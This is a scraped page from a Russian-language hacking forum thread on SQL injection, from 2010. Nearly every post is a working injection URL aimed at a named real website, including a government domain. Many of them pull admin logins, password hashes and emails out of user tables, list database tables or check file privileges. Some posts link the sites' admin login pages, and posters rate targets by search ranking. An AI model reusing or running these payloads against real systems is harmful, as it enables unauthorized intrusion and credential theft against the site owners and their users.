SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://www.noisehire.com/instruments/cr161c.php?id=-4 UNION SELECT 1,2,3,4,5,6,7,concat(user_name,0x3a,user_password,0x3a,user_email),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from cpg14x_users--+
     
    #13101 R1dex, 25 Sep 2010
    Last edited by a moderator: 25 Sep 2010
    1 person likes this.
  2. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    [/B]
    http://www.otdveridodveri.ru/faq.php?id=3+and+1=0+union+select+1,group_concat(schema_name),3,4,5+from+information_schema.schemata+--+
    ТИЦ : 10 PR: 2
     
    #13102 tracy, 25 Sep 2010
    Last edited by a moderator: 25 Sep 2010
    1 person likes this.
  3. brutos

    brutos Member

    Joined:
    25 Nov 2009
    Messages:
    123
    Likes Received:
    27
    Reputations:
    8
    http://vivatclub.ru/fitness/view_news.php?id=-55'+and+1=2+union+select+1,2,cast(version()+as+char),4,5,6+--+
    Version: 4.1.7
    PR 2, ТИЦ 110
     
  4. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://www.ifanz.com/04/subpage.php?ID=-42 union select 1,2,3,4,version(),6,7--+
    Code:
    http://www.oceanindependence.com/yacht_forcharter.php?id=-2376 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,version(),101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162--+
    Code:
    http://www.austinlehman.com/pages/local_bites_individual/127.php?id=-14 union select 1,2,3,4,5,6,group_concat(concat(user_login,0x3a,user_pass)separator 0x3c62723e),8,9,0 from+wp_users--+
     
  5. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.bordy.ua/index.php?id=8+and+1=0+union+select+1,2,version(),4,5+--
    PR: 2


    http://www.airdisaster.ru/reports.php?id=15+and+1=0+union+select+1,2,3,concat_ws(0x3a,user_id,username,password),5,6+from+ads_forum__users+limit+0,1+--+
    Админка форума http://www.airdisaster.ru/forum/admin.php

    ТИЦ : 70

    view-source:http://www.elcable.ru/product/catalog/?id=2+and+1=0+union+select+1,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()+--+
    ТИЦ : 1100

    view-source:http://www.elcable.ru/product/catalog/?id=2+and+1=0+union+select+1,file_priv,3,4,5,6,7,8+from+mysql.user+--+
    file_priv= Y
     
    #13105 tracy, 26 Sep 2010
    Last edited: 26 Sep 2010
    1 person likes this.
  6. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19
    http://www.1src.com/freeware/fileinfo.php?id=-1674'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13
     
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.diariodominicano.com/n.php?id=-15239+union+select+1,group_concat(username,0x3a,password)+from+writers--
     
    _________________________
  8. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    одно и то же на всех сайтах

    http://artpoligon.ru/see.php?file=0+union+select+1,2,concat_ws(char(58),user,char(32),pass),4,5+from+auth--

    http://www.evrohouse.ru/see.php?file=0+union+select+1,2,concat_ws(char(58)%20,user,char(32),pass),4,5+from+auth--

    http://artpoligon.ru/admin/index.php
    http://www.evrohouse.ru/admin/login.php


    http://www.instruktora.net/see2.php?id_photo=-16+union+select+1,2,group_concat(name,char(58),pass),4,5+from+user--

    http://www.instruktora.net/login.php
     
    _________________________
    #13108 Uex Urgent, 27 Sep 2010
    Last edited: 27 Sep 2010
    1 person likes this.
  9. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://ctsv.engec.ru/news/index.php?id1=258+and+1=0+UnIon+selECt+1,2,3,4,version(),6,7,8,9,10,11,12,13,14+--+
    4.1.22
    ТИЦ : 200 PR: 4


    view-source:http://www.tdgalion.ru/new.php?article=1+and+1=0+union+select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()+--+
    ТИЦ : 650

    http://www.shinexpress.ru/goods_detail.php?id_goods=770583'+and+1=0+UnIon+selECt+1,2,concat_ws(0x3a,username,password,admin_email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+admin+limit+0,1+--+
    ТИЦ : 110 PR: 3

    /admin запрещено,а к users неподходит пара логин:пароль

    http://kolesaonline.ru/news.php?id=59+and+1=0+union+select+1,version(),3,4,5,6+--+
    ТИЦ : 110 PR: 2

    4.1.25-log
     
    #13109 tracy, 27 Sep 2010
    Last edited: 27 Sep 2010
    1 person likes this.
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.asap-utilities.com/asap-utilities-excel-tools-tip.php?tip=259&utilities=97'+or+(1,1)=(select+count(0),concat((select+concat(user_login,char(58),user_pass)+from+wp_users+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+
     
    _________________________
    1 person likes this.
  11. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.novostroy.su/index.php5?class=search&module=objects&objectId=644+or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+TABLE_NAME+from+information_schema.tables+where(table_schema!=0x696E666F726D6174696F6E5F736368656D61)limit+4,1),1,64),floor(rand(0)*2)))
    ТИЦ: 220
    44 таблиц MYSQL-5


    http://www.yit-dom.ru/main.php?page=static&number=1+and+1=0+union+select+1,group_concat(table_name+SEPARATOR+0x3c62723e),3,4,5,6+from+information_schema.tables+Where+table_schema=database()+--+
    ТИЦ : 200
     
    1 person likes this.
  12. FlatL1ne

    FlatL1ne Elder - Старейшина

    Joined:
    5 Oct 2007
    Messages:
    89
    Likes Received:
    31
    Reputations:
    10
    http://ocenshik.mostpp.ru/news.php?id=1+and+1=0+union+select+1,2,3,4,version(),6,7,8+--+
    mysql 4.0.27
     
  13. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://www.abcbookworld.com/view_author.php?id=3010 or 1 group by concat((select concat(version(),0x3a,user())),floor(rand(0)*2))having min(0) or 1--+
    Code:
    http://www.farawaybeauties.com/gallery.php?id=-42175' union select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20--+
     
    1 person likes this.
  14. dlb

    dlb New Member

    Joined:
    16 Sep 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    http://www.symbianfrance.com/logiciel.php?num=11-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
    ТИЦ 10
    PR 4
     
  15. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87




























     
    1 person likes this.
  16. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.viteks.info/product_show.php?id=55'+and+1=0+UnIon+selECt+1,2,group_concat(table_name),4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()+--+

    ТИЦ : 20 PR: 3

    http://www.s-kraski.ru/press_center/show.php?id=1+and+1=0+UnIon+selECt+1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables+where+Table_schema=database()+--+

    ТИЦ : 10 PR: 2

    http://www.mariinskaia.com/cms/project_show.php?id=57+and+1=0+UnIon+selECt+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16+--+

    ТИЦ : 10

    http://litr.pageforyou.ru/works/show.php?id=313+or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+version()),1,64),floor(rand(0)*2)))

    4.1.25-log

    http://www.benzoland.ru/show.php?id=781+and+1=0+UnIon+selECt+1,2,version(),4,5,6,7,8,9,10,11,12,13+--++--+

    4.1.25-log

    http://www.glass-decor.ru/news/show.php?id=42+and+1=0+union+select+group_concat(table_name),2+from+information_schema.tables+where+table_schema=0x676c6173736465636f7272755f6462+--+
     
  17. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    домен вообще жесть)))))))))))))))))))

    http://www.gotohui.com/ask/zj_detail.php?userid=-20060728+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)y+group+by+concat(mid((select+concat_ws(0x3a,version(),database(),user())+from+INFORMATION_SCHEMA.TABLES+limit+0,1),1,65),floor(rand(0)*2)))y)--+
     
    _________________________
    6 people like this.
  18. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    http://ru-chel.ru/ind.php?pn=4&id_categ=-31+union+select+1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x414b4b+--+

    Тиц : 10
     
    1 person likes this.
  19. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    PHP:
    http://bezkomissii.com/list.php?category=-11+union+select+1,2,version(),4,5,6,7,8,9,10--
    ТИЦ: 10
     
  20. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    http://www.pastosaludese.gov.co/portal/faq/see.php?id=-181+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+group_concat(user,char(58,32),pass)+from+usuar+limit+0,1),1,60),floor(rand(0)*2)))n)--
     
    _________________________
Thread Status:
Not open for further replies.